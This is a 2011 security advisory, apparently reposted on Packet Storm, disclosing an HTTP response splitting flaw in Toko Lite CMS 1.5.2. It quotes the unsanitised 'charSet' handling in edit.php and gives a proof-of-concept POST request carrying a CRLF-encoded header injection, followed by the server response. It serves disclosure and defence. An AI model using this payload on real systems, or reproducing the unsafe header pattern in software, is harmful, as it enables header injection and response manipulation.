Toko Lite CMS 1.5.2 HTTP Response Splitting

2011-09-19T00:00:00
ID PACKETSTORM:105218
Type packetstorm
Reporter LiquidWorm
Modified 2011-09-19T00:00:00

Description

                                        
                                            `  
Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability  
  
  
Vendor: Toko  
Product web page: http://toko-contenteditor.pageil.net  
Affected version: 1.5.2  
  
Summary: Toko Web Content Editor cms is a compact, multi language, open  
source web editor and content management system (CMS). It is advanced  
easy to use yet fully featured program that can be integrated with any  
existing site. It takes 2 minuets to install even for non technical users.   
  
Desc: Input passed to the 'charSet' parameter in 'edit.php' is not properly  
sanitised before being returned to the user. This can be exploited to insert  
arbitrary HTTP headers, which are included in a response sent to the user.  
  
  
====================================================================  
/edit.php:  
--------------------------------------------------------------------  
  
3: $charSet = "iso-8859-1";  
4: $dir = "ltr";  
5:  
6: if ( isset( $_POST[ "charSet" ] ) )  
7: {  
8: $charSet = $_POST[ "charSet" ];  
9:  
10: if ( $charSet == "windows-1255" )  
11: {  
12: $dir = "rtl";  
13: }  
14: }  
15:  
16: header( "Content-Type: text/html; charset=" . $charSet );  
  
====================================================================  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
Apache 2.2.14 (Win32)  
PHP 5.3.1  
MySQL 5.1.41  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2011-5048  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5048.php  
  
CWE ID: 113  
  
  
22.03.2011  
  
  
------------  
  
  
POST /tokolite1.5.2/edit.php HTTP/1.1  
Content-Length: 55  
Content-Type: application/x-www-form-urlencoded  
Cookie: PHPSESSID=as9l9t0a7rs9pmuflb7c5s9o70; pma_fontsize=82%25  
Host: localhost:80  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)  
  
charSet=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection  
  
--  
  
HTTP/1.1 302 Found  
Date: Tue, 22 Mar 2011 03:57:30 GMT  
Server: Apache/2.2.14 (Win32)  
X-Powered-By: PHP/5.3.1  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  
Pragma: no-cache  
Location: Login.php  
Content-Length: 0  
Keep-Alive: timeout=5, max=64  
Connection: Keep-Alive  
Content-Type: text/html; charset=  
ZSL-Custom-Header: love_injection  
`